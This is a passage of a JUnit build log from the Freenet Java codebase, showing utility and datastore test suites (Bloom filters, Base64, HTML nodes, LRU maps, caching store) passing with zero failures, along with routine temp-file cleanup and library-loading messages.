    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 24,415 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 24,415 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12048372ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12264320ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] testCachingFreenetStoreCHK cleaner finished successfully.
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] testCachingFreenetStoreCHK cleaner in progress: 0/100
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testCHKPresent took 14,834 sec
    [junit] Testcase: testCHKDelayedTurnOnSlotFiltersWithCleaner took 2,049 sec
    [junit] Testcase: testCHKPresentWithAbort took 3,377 sec
    [junit] Testcase: testCHKPresentWithClose took 2,452 sec
    [junit] Testcase: testCHKDelayedTurnOnSlotFilters took 1,186 sec
    [junit] Shutting down...
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Running freenet.support.Base64Test
    [junit] Testsuite: freenet.support.Base64Test
    [junit] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,708 sec
    [junit] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,708 sec
    [junit] 
    [junit] Testcase: testIllegalBaseLength took 0,017 sec
    [junit] Testcase: testIllegalBaseCharacter took 0,001 sec
    [junit] Testcase: testDecodeStandard took 0,005 sec
    [junit] Testcase: testEncodeDecode took 0,001 sec
    [junit] Testcase: testEncodeStandard took 0,005 sec
    [junit] Testcase: testDecode took 0,001 sec
    [junit] Testcase: testEncode took 0,001 sec
    [junit] Testcase: testRandom took 1,116 sec
    [junit] Testcase: testEncodePadding took 0,001 sec
    [junit] Running freenet.support.BitArrayTest
    [junit] Testsuite: freenet.support.BitArrayTest
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,503 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,503 sec
    [junit] 
    [junit] Testcase: testShrinkGrow took 0,008 sec
    [junit] Testcase: testSetAndGetBit took 0,001 sec
    [junit] Testcase: testUnsignedByteToInt took 0,004 sec
    [junit] Testcase: testToStringEmpty took 0,001 sec
    [junit] Testcase: testGetSize took 0 sec
    [junit] Testcase: testLastOne took 0,001 sec
    [junit] Testcase: testFirstOne took 0,001 sec
    [junit] Testcase: testSetBit_OutOfBounds took 0,001 sec
    [junit] Testcase: testBitArray_int took 0 sec
    [junit] Testcase: testToStringAllEquals took 0,002 sec
    [junit] Testcase: testSetAllOnes took 0 sec
    [junit] Running freenet.support.BloomFilterTest
    [junit] Testsuite: freenet.support.BloomFilterTest
    [junit] ---freenet.support.CountingBloomFilter@6a790e37---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ---freenet.support.BinaryBloomFilter@7a631c70---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,65 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6,65 sec
    [junit] ------------- Standard Output ---------------
    [junit] ---freenet.support.CountingBloomFilter@6a790e37---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ---freenet.support.BinaryBloomFilter@7a631c70---
    [junit]           k = 1
    [junit]           q = 0.3935063648773005
    [junit]           p = 0.3935063648773005
    [junit]       limit = 0.41330375343366554
    [junit]      actual = 0.38916015625
    [junit]  actual / p = 0.9889551757856427
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testCountingFilterRemove took 3,704 sec
    [junit] Testcase: testBinaryFilterPositive took 0,159 sec
    [junit] Testcase: testCountingFilterFalsePositive took 0,922 sec
    [junit] Testcase: testCountingFilterPositive took 0,032 sec
    [junit] Testcase: testBinaryFilterFalsePositive took 1,279 sec
    [junit] Running freenet.support.BufferTest
    [junit] Testsuite: freenet.support.BufferTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,543 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,543 sec
    [junit] 
    [junit] Testcase: testDataInputStreamBuffer took 0,01 sec
    [junit] Testcase: testByteArrayBuffer took 0,003 sec
    [junit] Testcase: testCopy took 0,002 sec
    [junit] Testcase: testByteArrayIndexBuffer took 0,001 sec
    [junit] Testcase: testHashcode took 0,062 sec
    [junit] Testcase: testLongBufferToString took 0,001 sec
    [junit] Testcase: testEquals took 0,001 sec
    [junit] Testcase: testBadLength took 0 sec
    [junit] Running freenet.support.ByteArrayWrapperTest
    [junit] Testsuite: freenet.support.ByteArrayWrapperTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] 
    [junit] Testcase: testWrapper took 0,074 sec
    [junit] Running freenet.support.ByteBufferInputStreamTest
    [junit] Testsuite: freenet.support.ByteBufferInputStreamTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,456 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,456 sec
    [junit] 
    [junit] Testcase: testUnsignedRead took 0,013 sec
    [junit] Running freenet.support.DoublyLinkedListImplTest
    [junit] Testsuite: freenet.support.DoublyLinkedListImplTest
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testIternator took 0,032 sec
    [junit] Testcase: testPopN took 0,001 sec
    [junit] Testcase: testClearSize took 0,001 sec
    [junit] Testcase: testHeadTail took 0 sec
    [junit] Testcase: testRandomRemovePush took 0 sec
    [junit] Testcase: testForwardShiftUnshift took 0,001 sec
    [junit] Testcase: testRandomInsert took 0,003 sec
    [junit] Testcase: testForwardPushPop took 0 sec
    [junit] Testcase: testRandomShiftPush took 0 sec
    [junit] Testcase: testShiftN took 0 sec
    [junit] Running freenet.support.FieldTrimSecondTest
    [junit] Testsuite: freenet.support.FieldTrimSecondTest
    [junit] Input: 50 KiB/s Parsed: 51200   Intended: 51200
    [junit] Input: 1.5 MiB/sec  Parsed: 1572864 Intended: 1572864
    [junit] Input: 128 kbps Parsed: 128000  Intended: 128000
    [junit] Input: 20 KiB   Parsed: 20480   Intended: 20480
    [junit] Input: 5800 Parsed: 5800    Intended: 5800
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,635 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,635 sec
    [junit] ------------- Standard Output ---------------
    [junit] Input: 50 KiB/s Parsed: 51200   Intended: 51200
    [junit] Input: 1.5 MiB/sec  Parsed: 1572864 Intended: 1572864
    [junit] Input: 128 kbps Parsed: 128000  Intended: 128000
    [junit] Input: 20 KiB   Parsed: 20480   Intended: 20480
    [junit] Input: 5800 Parsed: 5800    Intended: 5800
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: test took 1,133 sec
    [junit] Running freenet.support.FieldsTest
    [junit] Testsuite: freenet.support.FieldsTest
    [junit] Tests run: 18, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,396 sec
    [junit] Tests run: 18, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,396 sec
    [junit] 
    [junit] Testcase: testBytesToLongsException took 0,06 sec
    [junit] Testcase: testCommaListFromString took 0,001 sec
    [junit] Testcase: testHashcodeForByteArray took 0 sec
    [junit] Testcase: testLongHashcode took 0 sec
    [junit] Testcase: testHexToLong took 0,002 sec
    [junit] Testcase: testBoolToString took 0 sec
    [junit] Testcase: testBytesToLong took 0,001 sec
    [junit] Testcase: testIntsToBytes took 0,001 sec
    [junit] Testcase: testCompareVersion took 0,007 sec
    [junit] Testcase: testTrimLines took 0,004 sec
    [junit] Testcase: testHexToInt took 0,001 sec
    [junit] Testcase: testBytesToInt took 0 sec
    [junit] Testcase: testGetDigits took 0,708 sec
    [junit] Testcase: testStringToBool took 0,001 sec
    [junit] Testcase: testStringToBoolWithDefault took 0,001 sec
    [junit] Testcase: testStringArrayToCommaList took 0 sec
    [junit] Testcase: testBytesToLongException took 0,001 sec
    [junit] Testcase: testLongsToBytes took 0,001 sec
    [junit] Running freenet.support.HTMLEncoderDecoderTest
    [junit] Testsuite: freenet.support.HTMLEncoderDecoderTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,969 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,969 sec
    [junit] 
    [junit] Testcase: testCompactRepeated took 0,092 sec
    [junit] Testcase: testDecodeAppendedEntities took 0,248 sec
    [junit] Testcase: testIsWhiteSpace took 0,002 sec
    [junit] Testcase: testDecodeIncomplete took 0 sec
    [junit] Testcase: testDecodeSingleEntities took 0,014 sec
    [junit] Testcase: testCompactMixed took 0,001 sec
    [junit] Running freenet.support.HTMLNodeTest
    [junit] Testsuite: freenet.support.HTMLNodeTest
    [junit] Tests run: 32, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,797 sec
    [junit] Tests run: 32, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,797 sec
    [junit] 
    [junit] Testcase: testHTMLNode_StringStringStringString_WrongAttributeName took 0,048 sec
    [junit] Testcase: testAddChildSameName took 0,018 sec
    [junit] Testcase: testHTMLNode_StringStringStringString_WrongNodeName took 0,002 sec
    [junit] Testcase: testAddChildUsingTheNodeItselfAsChild took 0,001 sec
    [junit] Testcase: testAddChild_StringArrayArrayString took 0,002 sec
    [junit] Testcase: testHTMLNodeArray_nullAttributeValue took 0,005 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringString took 0,124 sec
    [junit] Testcase: testHTMLNode_AttributesArray took 0,009 sec
    [junit] Testcase: testAddChildrenSameObject took 0,001 sec
    [junit] Testcase: testAddChild_StringArrayArray took 0,001 sec
    [junit] Testcase: testAddGetAttributes took 0,009 sec
    [junit] Testcase: testGenerate_HTMLNode_withChild took 0,003 sec
    [junit] Testcase: testGenerate_fromHTMLNode_String took 0,001 sec
    [junit] Testcase: testAddAttribute_nullAttributeValue took 0,001 sec
    [junit] Testcase: testAddChildrenUsingTheNodeItselfAsChild took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringStringStringString took 0,002 sec
    [junit] Testcase: testHTMLNode_nullAttributeValue took 0,003 sec
    [junit] Testcase: testAddChild_StringStringStringString took 0,002 sec
    [junit] Testcase: testGenerate_fromHTMLNode_percentName took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNode_StringStringString took 0,002 sec
    [junit] Testcase: testGenerate_fromHTMLNode_textareaDivA took 0,005 sec
    [junit] Testcase: testHTMLDoctype_generate took 0,001 sec
    [junit] Testcase: testGetAttribute took 0,003 sec
    [junit] Testcase: testAddChildSameObject took 0,001 sec
    [junit] Testcase: testHTMLNode_nullAttributeName took 0,001 sec
    [junit] Testcase: testHTMLNode_attributeArrays_differentLengths took 0,001 sec
    [junit] Testcase: testGetContent took 0,001 sec
    [junit] Testcase: testHTMLNodeArray_nullAttributeName took 0,001 sec
    [junit] Testcase: testAddChild_StringStringString took 0,001 sec
    [junit] Testcase: testAddAttribute_nullAttributeName took 0,001 sec
    [junit] Testcase: testGenerate_fromHTMLNodeWithChild_SpecialNames took 0,013 sec
    [junit] Testcase: testSameAttributeManyTimes took 0,003 sec
    [junit] Running freenet.support.HexUtilTest
    [junit] Testsuite: freenet.support.HexUtilTest
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,763 sec
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,763 sec
    [junit] 
    [junit] Testcase: testBytesToHex_byteIntInt_WithLongReading took 0,059 sec
    [junit] Testcase: testBitsToBytes_BitSetInt took 0,014 sec
    [junit] Testcase: testBytesToHex_byteIntInt_WithLongOffset took 0 sec
    [junit] Testcase: testHexToBits took 0,002 sec
    [junit] Testcase: testHexToBytes_StringByteInt_WithShortArray took 0,001 sec
    [junit] Testcase: testCountBytesForBits_int took 0,026 sec
    [junit] Testcase: testBiToHex_BigInteger took 0,009 sec
    [junit] Testcase: testHexToBytes_WithBadDigit took 0,001 sec
    [junit] Testcase: testBitsToBytes_WithShortSize took 0,001 sec
    [junit] Testcase: testBytesToHexZeroLength took 0,001 sec
    [junit] Testcase: testHexToBytes_StringByteInt took 0,008 sec
    [junit] Testcase: testHexToBytes_StringByteInt_WithLongOffset took 0,001 sec
    [junit] Testcase: testHexToBytes_StringInt took 0,008 sec
    [junit] Testcase: testHexToBytes_String took 0,014 sec
    [junit] Testcase: testWriteAndReadBigInteger took 0,002 sec
    [junit] Testcase: testBytesToBits_byteBitSetInt took 0,029 sec
    [junit] Testcase: testBitsToHexString took 0 sec
    [junit] Testcase: testBytesToHex_byte took 0,01 sec
    [junit] Testcase: testBytesToHex_byteIntInt_WithZeroLength took 0,001 sec
    [junit] Running freenet.support.JVMVersionTest
    [junit] Testsuite: freenet.support.JVMVersionTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,666 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,666 sec
    [junit] 
    [junit] Testcase: testNull took 0,026 sec
    [junit] Testcase: testCompare took 0,135 sec
    [junit] Testcase: testTooOld took 0,001 sec
    [junit] Testcase: testRecentEnough took 0,002 sec
    [junit] Running freenet.support.LRUMapTest
    [junit] Testsuite: freenet.support.LRUMapTest
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,803 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,803 sec
    [junit] 
    [junit] Testcase: testPushNull took 0,104 sec
    [junit] Testcase: testGetNullKey took 0,004 sec
    [junit] Testcase: testPeekValue took 0,009 sec
    [junit] Testcase: testRemoveNotPresent took 0,004 sec
    [junit] Testcase: testGet took 0,004 sec
    [junit] Testcase: testKeys took 0,012 sec
    [junit] Testcase: testSize took 0,009 sec
    [junit] Testcase: testContainsKey took 0,004 sec
    [junit] Testcase: testRemoveNullKey took 0,004 sec
    [junit] Testcase: testPushSameKey took 0,004 sec
    [junit] Testcase: testPopValueFromEmpty took 0 sec
    [junit] Testcase: testPopValue took 0,007 sec
    [junit] Testcase: testPushSameObjTwice took 0,005 sec
    [junit] Testcase: testPopKey took 0,007 sec
    [junit] Testcase: testIsEmpty took 0,007 sec
    [junit] Testcase: testRemoveKey took 0,007 sec
    [junit] Running freenet.support.LRUQueueTest
    [junit] Testsuite: freenet.support.LRUQueueTest
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,702 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,702 sec
    [junit] 
    [junit] Testcase: testPushNull took 0,054 sec
    [junit] Testcase: testToArray2 took 0,011 sec
    [junit] Testcase: testToArray took 0,021 sec
    [junit] Testcase: testRemoveNotPresent took 0,009 sec
    [junit] Testcase: testPop took 0,012 sec
    [junit] Testcase: testSize took 0,008 sec
    [junit] Testcase: testToArrayOrdered2 took 0,009 sec
    [junit] Testcase: testToArrayOrdered took 0,005 sec
    [junit] Testcase: testToArrayEmptyQueue took 0,001 sec
    [junit] Testcase: testPushLeast took 0,005 sec
    [junit] Testcase: testContains took 0,007 sec
    [junit] Testcase: testRemoveNull took 0,004 sec
    [junit] Testcase: testElements took 0,007 sec
    [junit] Testcase: testPushSameObjTwice took 0,005 sec
    [junit] Testcase: testIsEmpty took 0,007 sec
    [junit] Testcase: testRemove took 0,009 sec
    [junit] Running freenet.support.ListUtilsTest
    [junit] Testsuite: freenet.support.ListUtilsTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] 
    [junit] Testcase: testRemoveByObject took 0,025 sec
    [junit] Testcase: testRemoveByRandom took 0,006 sec
    [junit] Testcase: testRemoveByIndex took 0,005 sec
    [junit] Testcase: testRemoveByRandomSimple took 0,002 sec
    [junit] Running freenet.support.LoaderTest
    [junit] Testsuite: freenet.support.LoaderTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,504 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,504 sec
    [junit] 
    [junit] Testcase: testLoader took 0,012 sec
    [junit] Running freenet.support.MemoryLimitedJobRunnerTest
    [junit] Testsuite: freenet.support.MemoryLimitedJobRunnerTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 26,521 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 26,521 sec
    [junit] ------------- Standard Output ---------------
